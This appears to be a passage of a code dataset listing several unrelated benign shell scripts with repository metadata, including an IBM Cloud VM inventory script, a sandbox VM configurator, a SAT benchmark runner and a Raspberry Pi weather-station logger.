if [ -z "$APY_KEY" ]; then
echo "API KEY was not set."
exit
fi
ibmcloud update -f > /dev/null 2>&1
ibmcloud plugin update --all > /dev/null 2>&1
ibmcloud login --no-region --apikey "$APY_KEY" > /dev/null 2>&1
}
function get_all_crn(){
TODAY=$(date '+%Y%m%d')
rm -f /tmp/crns-"$TODAY"
ibmcloud pi service-list --json | jq -r '.[] | "\(.CRN),\(.Name)"' >> /tmp/crns-"$TODAY"
}
function set_powervs() {
local CRN="$1"
if [ -z "$CRN" ]; then
echo "CRN was not set."
exit
fi
ibmcloud pi st "$CRN" > /dev/null 2>&1
}
function vm_age() {
TODAY=$(date '+%Y%m%d')
rm -f /tmp/vms-"$TODAY"
PVS_NAME=$1
IBMCLOUD_ID=$2
IBMCLOUD_NAME=$3
PVS_ZONE=$4
ibmcloud pi ins --json | jq -r '.Payload.pvmInstances[] | "\(.pvmInstanceID),\(.serverName),\(.networks[].ip),\(.status),\(.sysType),\(.creationDate),\(.osType),\(.processors),\(.memory),\(.health.status)"' > /tmp/vms-"$TODAY"
while read -r line; do
VM_ID=$(echo "$line" | awk -F ',' '{print $1}')
VM_NAME=$(echo "$line" | awk -F ',' '{print $2}')
STATUS=$(echo "$line" | awk -F ',' '{print $4}')
SYSTYPE=$(echo "$line" | awk -F ',' '{print $5}')
VM_CREATION_DATE=$(echo "$line" | awk -F ',' '{print $6}')
Y=$(echo "$VM_CREATION_DATE" | awk -F '-' '{print $1}')
M=$(echo "$VM_CREATION_DATE" | awk -F '-' '{print $2}' | sed 's/^0*//')
D=$(echo "$VM_CREATION_DATE" | awk -F '-' '{print $3}' | awk -F 'T' '{print $1}' | sed 's/^0*//')
DIFF=$(python3 -c "from datetime import date as d; print(d.today() - d($Y, $M, $D))" | awk -F ',' '{print $1}')
OS=$(echo "$line" | awk -F ',' '{print $7}')
PROCESSOR=$(echo "$line" | awk -F ',' '{print $8}')
MEMORY=$(echo "$line" | awk -F ',' '{print $9}')
HEALTH=$(echo "$line" | awk -F ',' '{print $10}')
DIFF=$(echo "$DIFF" | tr -d "days" | tr -d " ")
if [[ "$DIFF" == "0:00:00" ]]; then
DIFF="0"
fi
echo "$IBMCLOUD_ID,$IBMCLOUD_NAME,$PVS_NAME,$PVS_ZONE,$VM_ID,$VM_NAME,$DIFF,$OS,$PROCESSOR,$MEMORY,$SYSTYPE,$STATUS,$HEALTH" >> all_vms_"$TODAY".csv
done < /tmp/vms-"$TODAY"
}
function get_vms_per_crn(){
while read -r line; do
CRN=$(echo "$line" | awk -F ',' '{print $1}')
NAME=$(echo "$line" | awk -F ',' '{print $2}')
POWERVS_ZONE=$(echo "$line" | awk -F ':' '{print $6}')
set_powervs "$CRN"
vm_age "$NAME" "$1" "$2" "$POWERVS_ZONE"
done < /tmp/crns-"$TODAY"
}
function run (){
ACCOUNTS=()
while IFS= read -r line; do
clean_line=$(echo "$line" | tr -d '\r')
ACCOUNTS+=("$clean_line")
done < ./cloud_accounts
for i in "${ACCOUNTS[@]}"; do
IBMCLOUD=$(echo "$i" | awk -F "," '{print $1}')
IBMCLOUD_ID=$(echo "$IBMCLOUD" | awk -F ":" '{print $1}')
IBMCLOUD_NAME=$(echo "$IBMCLOUD" | awk -F ":" '{print $2}')
API_KEY=$(echo "$i" | awk -F "," '{print $2}')
if [ -z "$API_KEY" ]; then
echo
echo "ERROR: please, set your IBM Cloud API Key."
echo " e.g ./vms-age.sh API_KEY"
echo
exit 1
else
#API_KEY=$1
echo
check_dependencies
check_connectivity
authenticate "$API_KEY"
get_all_crn
get_vms_per_crn "$IBMCLOUD_ID" "$IBMCLOUD_NAME"
fi
done
awk 'NF' ./*.csv
}
run "$@"
| true
|
b886e0799d2e36ae5c9cef53cd86b7519a3c619c
|
Shell
|
MW-autocat-script/MW-autocat-script
|
/catscripts/Entertainment/Video_games/Video_game_consoles/Sony/PlayStation2.sh
|
UTF-8
| 375
| 3.046875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
KEYWORDS_PS2="Play(| )Station(| )2|\bPS(| )2\b"
KEYWORDS_PS2_EXCLUDE="PS(| )2(| )(mouse|port|keyboard)"
KEYWORDS_PS2_ALL="$KEYWORDS_PS2"
if [ "$1" == "" ]; #Normal operation
then
debug_start "PlayStation 2"
PS2=$(egrep -i "$KEYWORDS_PS2" "$NEWPAGES" | egrep -iv "$KEYWORDS_PS2_EXCLUDE")
categorize "PS2" "PlayStation 2"
debug_end "PlayStation 2"
fi
| true
|
678e67ffc8910eb2fe762f4225b29204759201e2
|
Shell
|
private-octopus/ithitools
|
/src/oneMonthM3.sh
|
UTF-8
| 775
| 3.25
| 3
|
[
"MIT"
] |
permissive
|
# !/bin/bash
pwd
cd /home/ubuntu
pwd
YEAR=$1
MM=$2
FIRST_DAY=$(date -d $YEAR-$MM-01 +%Y-%m-%d)
DATE=$(date -d $FIRST_DAY +%Y%m)
DAY_AFTER_MONTH=$(date -d "$FIRST_DAY +1 months" +%Y-%m-01)
LAST_DAY=$(date -d "$DAY_AFTER_MONTH -1 day" +%Y-%m-%d)
echo "First day: $FIRST_DAY"
echo "Day after month: $DAY_AFTER_MONTH"
echo "This month selector: $DATE"
echo "Last day of this month: $LAST_DAY"
find /home/rarends/data/$DATE* | grep ".csv" > m3_this_month.txt
echo "Found $(wc -l m3_this_month.txt) files in /home/rarends/data/$DATE*"
M3F1=/home/ubuntu/ithi/input/M3/M3-$LAST_DAY-summary.csv
echo "Creating summary file in $M3F1"
./ithitools/ithitools -S m3_this_month.txt -o $M3F1
echo "Computing metrics for $LAST_DAY"
./ithitools/ithitools -i /home/ubuntu/ithi -d $LAST_DAY -m
| true
|
88b603b278fad32dde78de820b890fe0aaf821f3
|
Shell
|
phaer/kassomat-scripts
|
/install.sh
|
UTF-8
| 781
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
set -eu
dir=$(dirname $(readlink -f "$0"))
executables=(changeomatic.sh kassomat-maintenance.sh payout-log-less.sh payout-restart.sh kassomat-set-coin-levels.py payout-log-tail.sh)
echo $executables
echo "installing payout systemd unit file"
ln -svf ${dir}/payout.service /etc/systemd/system/payout.service
echo "installing xession"
sudo -u kassomat ln -svf ${dir}/xsession ~kassomat/.xsession
chmod +x ~kassomat/.xsession
echo "installing openbox configuration"
sudo -u kassomat mkdir -p ~kassomat/.config/openbox
sudo -u kassomat ln -svf ${dir}/openbox-rc.xml ~kassomat/.config/openbox/rc.xml
for filename in ${executables[@]}
do
echo $filename
name="${filename%.*}"
ln -svf ${dir}/${filename} /usr/local/bin/${name}
chmod +x /usr/local/bin/${name}
done
| true
|
133e1a40b2dc4b5643c2b2d21805803fde3b8be5
|
Shell
|
MasuodSamarin/sd2iec_utils
|
/create_autoswap.sh
|
UTF-8
| 562
| 4.09375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# will search all sub folder in a given folder, and create an autoswap.lst file if more than one *.d64 is found
#
# usage:
# create_autoswap.sh folder
#
IFS=$(echo -en "\n\b") # take folders with ' ' as one entry
for DIR in $(find $1 -type d)
do
pushd "$DIR" >/dev/null
# create AUTOSWAP.LST
NUMBER_OF_D64=$(find *.d64 2>/dev/null | wc -l)
if [[ $NUMBER_OF_D64 > 1 ]]; then
echo "multiple d64 in folder $DIR, creating autoswap file"
find *.d64 >autoswap.lst
fi
popd >/dev/null
done
| true
|
c89d3bd8326650cc9149482ff6ec1caa84c6eb89
|
Shell
|
mahmoodsheikh36/scripts
|
/view_audio_spectrum.sh
|
UTF-8
| 240
| 2.515625
| 3
|
[] |
no_license
|
# view_audio_spectrum.sh
# show audio spectrum using sox
random_str=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 13)
sox --multi-threaded "$1" -n spectrogram -o /tmp/$random_str.png && sxiv /tmp/$random_str.png
rm /tmp/$random_str.png
| true
|
7a3b671014467cd908c35c3bbc6695f05b424e27
|
Shell
|
akhalitov/sandbox_old
|
/sandbox-template-update
|
UTF-8
| 2,108
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
set -x;
if [ $# -eq 0 ]; then
echo "No arguments"
exit 0
fi
SandboxID=`printf "%02d" $1`
CONFIG=$2
if [ -e "/root/sandbox/status/$SandboxID" ];then
echo "sandbox status file /root/sandbox/status/$SandboxID exists"
exit 0
else
echo "status = NetworkSetting" >> /root/sandbox/status/$SandboxID
TemplateName=`awk '/^template/{print $NF}' $CONFIG`
echo "template = $TemplateName" >> /root/sandbox/status/$SandboxID
Domain=`awk '/^domain/{print $NF}' $CONFIG`
echo "domain = $Domain" >> /root/sandbox/status/$SandboxID
UserPassword=`date|md5sum |awk '{print substr($0,0,10)}'`
echo "password = $UserPassword" >> /root/sandbox/status/$SandboxID
Sandbox_IP=`awk '/^sandbox-'$SandboxID'-VLAN/{print $NF}' /root/sandbox/config/ip.cfg`
echo "ip = $Sandbox_IP" >> /root/sandbox/status/$SandboxID
prlctl set Template_${TemplateName}_jumper --device-set net0 --ipadd ${Sandbox_IP}/24
prlctl set Template_${TemplateName}_jumper --device-set net1 --network sandbox-${SandboxID}-VLAN --ipadd 10.111.22.1
IPLayout=`awk '/^ip-layout/{print $NF}' $CONFIG`
IFS=';' read -ra VE_LIST_WITH_IP <<< "$IPLayout"
for i in "${VE_LIST_WITH_IP[@]}"; do
IFS=':' read -ra VE <<< "$i"
prlctl set Template_${TemplateName}_ve${VE[0]} --device-set net0 --network sandbox-${SandboxID}-VLAN --ipadd 10.111.22.${VE[1]}
VE_LIST+=${VE[0]}
VE_LIST+=";"
done
echo "ve_list = $VE_LIST" >> /root/sandbox/status/$SandboxID
sed -i 's/^\(status\s*=\s*\).*$/\1starting/' /root/sandbox/status/$SandboxID
prlctl start Template_${TemplateName}_jumper
VE_LIST=`awk '/^ve_list/{print $NF}' /root/sandbox/status/${SandboxID}`
for VE_ID in `echo $VE_LIST | sed 's/;/ /g'`; do
prlctl start Template_${TemplateName}_ve${VE_ID}
done
sed -i 's/^\(status\s*=\s*\).*$/\1template_started/' /root/sandbox/status/$SandboxID
sandbox-template-init $1
fi
set +x;
| true
|
feec8e6e2ead98c609f56c54efd40910c91e49ce
|
Shell
|
Timoniche/PDBAnalyzer
|
/simba_scripts/renaming_pdbs.sh
|
UTF-8
| 263
| 2.890625
| 3
|
[] |
no_license
|
root_path="/Users/ddulaev/Documents/BioInformatics/SIMBA3D"
for (( i = 1; i < 22; i++))
do
dir_path_iter="${root_path}/examples/command_line_tutorial/results/chr${i}"
cd ${dir_path_iter}
for file in *.pdb; do
mv "$file" "Simba3d_chr${i}.pdb"
done
done
| true
|
41521746507b4fc5e7fa3d92b2ceb29c1267b315
|
Shell
|
ajrouvoet/symmetry
|
/collect.sh
|
UTF-8
| 1,943
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
OUTDIR=./data/
REF=`git rev-parse HEAD`
TIMEOUT_IN=900
OPTS="-no-inverting-opt -activity-look-freq=1"
#-no-inverting-opt
#-no-inverting-opt -activity-nl-freq=1
#-no-inverting-opt -sym-var-bump
#-no-inverting-opt -sym-usage-var-bump"
echo "$OPTS" | while read opt
do
echo "-----------------------------------------------------------------------------------------"
echo ">> running with options: $opt"
echo "-----------------------------------------------------------------------------------------"
echo ""
find minisat/cnf\ test\ files/{fpga,battleship,chnl,Pigeonhole_shuffled,urquhart} -regex ".*\.cnf$" | grep -v "Sym" | while read f
do
# handle empty option sets
if `echo $opt | grep -q "^\s*$"`
then
opttext="vanilla"
else
opttext="$opt"
fi
optpath=`echo $opttext | sed "s/\-\| \|:\|;/_/g"`
name=`basename "$f"`
suite=`basename "$(dirname $f)"`
outpath="$OUTDIR/$REF/$optpath/$suite/$name.log"
outdir=`dirname "$outpath"`
mkdir -p "$outdir"
echo ">> Running $name from suite $suite ("$f")"
echo ">> CMD: ./minisat/build/release/bin/minisat_core $opt ${f}"
# collect output
echo "Test: $name" > "${outpath}"
echo "Options: $opt" >> "${outpath}"
echo "$opt"
data="`timeout ${TIMEOUT_IN} ./minisat/build/release/bin/minisat_core $opt "$f"`"
if [ $? != 124 ]
then
echo "$data" >> "${outpath}"
else
echo "TIMEOUT" >> "${outpath}"
fi
echo ">> Done (output in: $outpath)"
echo ""
done
done
| true
|
b3306e575414a3bc2396504e8339770d548fac52
|
Shell
|
zubatyuk/lxc-viz-cluster
|
/setup-server-common
|
UTF-8
| 651
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
#apt proxy
echo 'Acquire::http::proxy "http://aptproxy:3142";' > /etc/apt/apt.conf.d/02proxy
echo 'Acquire::https::proxy "http://approxy:3142";' >> /etc/apt/apt.conf.d/02proxy
#clean apt cache since we use apt-proxy-ng
cat > /etc/cron.hourly/apt-clean << EOF
#!/bin/bash
apt-get clean
EOF
chmod +x /etc/cron.hourly/apt-clean
#upgrades
apt-get -y install unattended-upgrades
echo "APT::Periodic::Update-Package-Lists \"1\";" > /etc/apt/apt.conf.d/20auto-upgrades
echo "APT::Periodic::Unattended-Upgrade \"1\";" >> /etc/apt/apt.conf.d/20auto-upgrades
#timezone
echo 'US/Central' > /etc/timezone
dpkg-reconfigure -f noninteractive tzdata
| true
|
bf5ab3a7ef976c1c36a6123879b9871bd2a8d0bc
|
Shell
|
Findus23/Umweltdatenmessung
|
/main.sh
|
UTF-8
| 6,239
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
PFAD="/var/www/" #Pfad zum Web-Verzeichnis
r=0 # Backup-Zahl auf Null setzen
IFS="; " #Spezial-Variable - enthält Trennzeichen zum Trennen von Luftdruck und -temperatur
re='^[0-9]+$' # Regulärer Ausdruck, ob Variable eine Zahl ist
pushbullet_api_key=$(cat /home/pi/Temperaturmessung/Fremddateien/pushbullet_settings.txt | head -n 1)
pushbullet_device=$(cat /home/pi/Temperaturmessung/Fremddateien/pushbullet_settings.txt | tail -n 1)
gpio mode 13 out # gelb
gpio mode 12 out # rot
gpio mode 3 out #grün
gpio write 13 0 # nur grün einschalten
gpio write 12 0
gpio write 3 1
if [ $1 ] # if- und case- Abfrage für Startparameter
then
case "$1" in
"-d")rm /home/pi/Temperaturmessung/dygraph.csv
;;
"-h") echo -e "-d csv-Datei leeren \nfür weitere Informationen siehe http://winkler.kremszeile.at/ oder https://github.com/Findus23/Umweltdatenmessung"
exit 1
;;
*) echo "unbekannter Parameter - Für Hilfe -h"
exit
;;
esac
fi
while true
do
uhrzeit=$(date +%Y/%m/%d\ %H:%M:%S) # z.B.: 2014/10/05 11:00:00 (für csv-Datei)
uhrzeit_display=$(date +%d.%m\ %H:%M:%S) # z.B.: 05.10 11:00:00 (für Display)
uhrzeit_lang=$(date +%d.%m.%y\ %H:%M:%S) # z.B.: 05.10.2014 11:00:00 (für Webinterface)
rasp=$(/opt/vc/bin/vcgencmd measure_temp | cut -c 6,7,8,9) #Betriebstemberatur messen
temp1=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-000802b53835/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l) #Innentemperatur
while [ "$temp1" == "-1.250" ] || [ "$temp1" == "85.000" ] || [ "$temp1" == "85.000" ]
do
gpio write 13 1
echo "----Temp1: $temp1"
temp1=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277abe1/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l)
gpio write 13 0
done
temp2=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277a5db/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l) #Gerätesensor 1
while [ "$temp2" == "-1.250" ] || [ "$temp2" == "85.000" ] || [ "$temp2" == "85.000" ]
do
gpio write 13 1
echo "----Temp2: $temp2"
temp2=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277a5db/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l)
gpio write 13 0
done
temp3=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-000802b4635f/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l) #Außensensor
while [ "$temp3" == "-1.250" ] || [ "$temp3" == "85.000" ] || [ "$temp3" == "85.000" ]
do
gpio write 13 1
echo "----Temp3: $temp3"
temp3=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-000802b4635f/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l)
gpio write 13 0
done
temp4=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277a5db/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l) #Gerätesensor 2
while [ "$temp3" == "-1.250" ] || [ "$temp4" == "85.000" ] || [ "$temp4" == "85.000" ]
do
gpio write 13 1
echo "----Temp4: $temp4"
temp4=$(echo "scale=3; $(grep 't=' /sys/bus/w1/devices/w1_bus_master1/10-00080277a5db/w1_slave | awk -F 't=' '{print $2}') / 1000" | bc -l)
gpio write 13 0
done
luft_roh=$(sudo python /home/pi/Temperaturmessung/Fremddateien/AdafruitDHT.py 2302 17) # Rohdaten des Luftfeuchtigkeits-Sensors
set -- $luft_roh #Zerlegen mithilfe von IFS (siehe ganz oben)
luft_temp=$1
luft_feucht=$2
while [ -z "$luft_roh" ] || [ "$(echo $luft_temp '>' 40 | bc -l)" -eq 1 ] || [ "$(echo $luft_temp '<' -20 | bc -l)" -eq 1 ]
do
gpio write 13 1
echo "----Luft: $luft_roh"
luft_roh=$(sudo python /home/pi/Temperaturmessung/Fremddateien/AdafruitDHT.py 2302 17) # Rohdaten des Luftfeuchtigkeits-Sensors
set -- $luft_roh
luft_temp=$1
luft_feucht=$2
gpio write 13 0
done
druck_roh=$(sudo python /home/pi/Temperaturmessung/Fremddateien/Adafruit_BMP085_auswertung.py) # Rohdaten des Luftdruck-Sensors
set -- $druck_roh
temp_druck=$1
druck=$2
qualitat=$(sudo /home/pi/Temperaturmessung/Fremddateien/airsensor -v -o)
if [ "$qualitat" = "0" ] || ! [[ $qualitat =~ $re ]]
then
qualitat=""
fi
ausgabe=${uhrzeit}\,${temp1}\,${temp2}\,${temp3}\,${temp4}\,${luft_temp}\,${luft_feucht}\,${druck}\,${temp_druck}\,${rasp},${qualitat}
echo $ausgabe >>/home/pi/Temperaturmessung/dygraph.csv
echo "$uhrzeit ${temp1},${temp2},${temp3},${temp4},${luft_temp},${luft_feucht},${druck},${temp_druck},${rasp},${qualitat}" #Ausgabe des aktuellen Wertes im Terminal
temp1_r=$(echo $temp1 |rev | cut -c 3- |rev)
temp2_r=$(echo $temp2 |rev | cut -c 3- |rev)
temp3_r=$(echo $temp3 |rev | cut -c 3- |rev)
temp4_r=$(echo $temp4 |rev | cut -c 3- |rev)
luft_temp_r=$(echo $luft_temp |rev | cut -c 3- |rev)
luft_feucht_r=$(echo $luft_feucht |rev | cut -c 3- |rev)
temp_druck_r=$(echo $temp_druck |rev | cut -c 2- |rev)
druck_r=$(echo $druck |rev | cut -c 2- |rev)
echo "$uhrzeit_display
$temp1_r
$temp2_r
$temp3_r
$temp4_r
$luft_temp_r
$luft_feucht_r
$temp_druck_r
$druck_r
$rasp
$qualitat" >/home/pi/Temperaturmessung/text.txt.temp #zuerst in temporäre Datei schreiben und dann verschieben, um kurzzeitig leere Datei zu vermeiden
echo "$uhrzeit_lang,${temp1_r},${temp2_r},${temp3_r},${temp4_r},${luft_temp_r},${luft_feucht_r},${temp_druck_r},${druck_r},${rasp},${qualitat}" >/home/pi/Temperaturmessung/text_ws.txt # Daten für Webseite
/home/pi/Temperaturmessung/diverses/wunderground.py $temp1 $temp2 $temp3 $temp4 $luft_temp $luft_feucht $temp_druck $druck $rasp $qualitat >> /home/pi/wunderground.log &
sudo cp /home/pi/Temperaturmessung/text_ws.txt ${PFAD}text_ws.txt
mv /home/pi/Temperaturmessung/text.txt.temp /home/pi/Temperaturmessung/text.txt
sudo cp /home/pi/Temperaturmessung/dygraph.csv ${PFAD}dygraph.csv
sleep 8 # kurz warten
r=$(($r +1)) # Anzahl der Durchläufe zählen
if [ "$r" == "1000" ] # und alle 1000 Durchgänge Sicherung anfertigen
then
cp /home/pi/Temperaturmessung/dygraph.csv /home/pi/Temperaturmessung/dygraph.csv.bak
python /home/pi/Temperaturmessung/Fremddateien/send.py "l.winkler23@me.com" "Backup" "" "/home/pi/Temperaturmessung/dygraph.csv" &
/home/pi/Temperaturmessung/Fremddateien/pushbullet_cmd.py $pushbullet_api_key note $pushbullet_device "Backup erfolgreich" "$uhrzeit_display"
echo "Backup"
r=0
fi
done
| true
|
3a85516f5c56165df71b5314e82d7ffa85e92c68
|
Shell
|
josephthweatt/Fulton-Furnace-Hackathon
|
/interfaces/admin
|
UTF-8
| 1,226
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
#get the directory where the script was executed
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
clear
echo "Welcome back, admin: "
echo
PS3='What do you want to do? (Enter 6 for menu) '
options=("Log Inventory" "Log rate of consumption" "View VATS suggestions"
"View community alerts" "View Inventory" "Menu" "Quit")
select opt in "${options[@]}"
do
case $opt in
"Log Inventory")
"$DIR"/view_inventory
"$DIR"/log_inventory
;;
"Log rate of consumption")
"$DIR"/view_inventory
"$DIR"/log_rate_of_consumption
;;
"View VATS suggestions")
echo "you chose choice 3"
;;
"View community alerts")
"$DIR"/admin_community_alerts
;;
"View Inventory")
"$DIR"/view_inventory
;;
"Menu")
echo "1) Log Inventory 5) View Inventory"
echo "2) Log rate of consumption 6) Menu"
echo "3) View VATS suggestions 7) Quit"
echo "4) View community alerts"
;;
"Quit")
break
;;
*) echo invalid option;;
esac
done
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.